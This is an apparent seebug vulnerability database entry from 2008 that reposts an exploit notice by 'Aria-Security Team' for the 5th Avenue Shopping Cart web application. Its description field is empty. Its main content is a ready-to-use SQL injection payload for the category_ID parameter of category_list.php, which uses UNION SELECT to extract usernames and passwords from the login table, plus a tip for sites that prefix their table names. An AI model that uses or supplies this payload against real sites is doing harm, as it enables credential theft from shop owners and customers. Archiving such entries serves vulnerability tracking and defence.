5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability

2008-04-19T00:00:00
ID SSV:8342
Type seebug
Reporter Root
Modified 2008-04-19T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Aria-Security Team (Persian Security Team)
http://Aria-Security.Net (Persian)
http://Aria-Security.com (ENG)
--------------------------------------------
5th avenue Shopping Cart SQL Injection
Greetz: AurA, Kinglet, NULL


category_list.php?category_ID=-1/**/UNION/**/SELECT/**/1,username,password,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/login/*

note: if error says :table login does not exist the website is using a prefix for tables.


Regards,
The-0utl4w